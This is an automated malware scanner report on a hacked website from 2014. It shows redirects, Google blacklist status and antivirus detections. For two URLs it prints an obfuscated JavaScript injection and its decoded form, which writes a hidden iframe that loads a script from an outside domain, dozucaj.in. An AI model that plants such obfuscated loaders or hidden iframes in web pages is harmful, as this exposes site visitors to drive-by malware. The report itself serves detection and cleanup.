Malware Scanner report for autark-casa.com

Malicious/Suspicious/Total URLs checked: 2/0/3
2 pages have malicious code. See details below.
Blacklists: Found
The website is marked by Google as suspicious.

The website "autark-casa.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=autark-casa.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.

Scanned pages/files

Request: http://autark-casa.com/
Server response:
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Sep 2014 19:16:19 GMT
Location: http://www.anticsa.com/shop/index.php?shop_ID=7&language=es&cPath=2304
Server: Apache
Vary: Accept-Encoding
Content-Length: 2
Content-Type: text/html
X-Powered-By: PleskLin
Status: clean

Request: http://www.anticsa.com/shop/index.php?shop_id=7&language=es&cpath=2304
Server response:
404 Not Found
Content-Length: 55518
Content-Type: text/html
Status: malicious
Malicious code - confirmed by antiviruses (see below)

aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29z-29z67z64z-6z2z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z2z1z60z73z62z83z1z3z53z10z55z3z85z-29z-29z-29z67z64z76z59z71z63z76z2z3z21z-29z-29z87z-6z63z70z77z63z-6z85z-29z-29z-29z62z73z61z79z71z63z72z78z8z81z76z67z78z63z2z-4z22z67z64z76z59z71z63z-6z77z76z61z23z1z66z78z78z74z20z9z9z62z73z84z79z61z59z68z8z67z72z9z61z73z79z7
...[1415 bytes skipped]...

Decoded script:


if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://dozucaj.in/count27.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://dozucaj.in/count27.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0'
...[854 bytes skipped]...

Antivirus reports:

Ikarus: Trojan.IframeRef
nProtect: JS:Trojan.Iframe.A
K7AntiVirus: Riskware
Emsisoft: JS:Trojan.Iframe.A (B)
McAfee-GW-Edition: Heuristic.BehavesLike.JS.Infected.A
DrWeb: JS.IFrame.151
Kaspersky: HEUR:Trojan.Script.Generic
Microsoft: Trojan:JS/Iframe.V
MicroWorld-eScan: JS:Trojan.Iframe.A
NANO-Antivirus: Trojan.Script.Iframe.rpyhz
F-Secure: JS:Trojan.Iframe.A
F-Prot: JS/IFrame.HC.gen
Norman: IframeRef.DM
GData: JS:Trojan.Iframe.A
Commtouch: JS/IFrame.HC.gen
BitDefender: JS:Trojan.Iframe.A

Request: http://www.anticsa.com/test404page.js
Server response:
404 Not Found
Content-Length: 55518
Content-Type: text/html
Status: malicious
Malicious code - confirmed by antiviruses (see below)

aa=/\w/.exec(1).index+[];aaa='0';try{location({});}catch(hgberger){if(aa===aaa)
f='-29z-29z67z64z-6z2z62z73z61z79z71z63z72z78z8z65z63z78z31z70z63z71z63z72z78z77z28z83z46z59z65z40z59z71z63z2z1z60z73z62z83z1z3z53z10z55z3z85z-29z-29z-29z67z64z76z59z71z63z76z2z3z21z-29z-29z87z-6z63z70z77z63z-6z85z-29z-29z-29z62z73z61z79z71z63z72z78z8z81z76z67z78z63z2z-4z22z67z64z76z59z71z63z-6z77z76z61z23z1z66z78z78z74z20z9z9z62z73z84z79z61z59z68z8z67z72z9z61z73z79z7
...[1415 bytes skipped]...

Decoded script:


if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://dozucaj.in/count27.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://dozucaj.in/count27.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0'
...[854 bytes skipped]...

Antivirus reports:

Ikarus: Trojan.IframeRef
nProtect: JS:Trojan.Iframe.A
K7AntiVirus: Riskware
Emsisoft: JS:Trojan.Iframe.A (B)
McAfee-GW-Edition: Heuristic.BehavesLike.JS.Infected.A
DrWeb: JS.IFrame.151
Kaspersky: HEUR:Trojan.Script.Generic
Microsoft: Trojan:JS/Iframe.V
MicroWorld-eScan: JS:Trojan.Iframe.A
NANO-Antivirus: Trojan.Script.Iframe.rpyhz
F-Secure: JS:Trojan.Iframe.A
F-Prot: JS/IFrame.HC.gen
Norman: IframeRef.DM
GData: JS:Trojan.Iframe.A
Commtouch: JS/IFrame.HC.gen
BitDefender: JS:Trojan.Iframe.A


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: autark-casa.com

Result:
HTTP/1.1 302 Found
Connection: close
Date: Fri, 26 Sep 2014 19:16:19 GMT
Location: http://www.anticsa.com/shop/index.php?shop_ID=7&language=es&cPath=2304
Server: Apache
Vary: Accept-Encoding
Content-Length: 2
Content-Type: text/html
X-Powered-By: PleskLin

...2 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: autark-casa.com
Referer: http://www.google.com/search?q=autark-casa.com

Result:
The result is similar to the first query. There are no suspicious redirects found.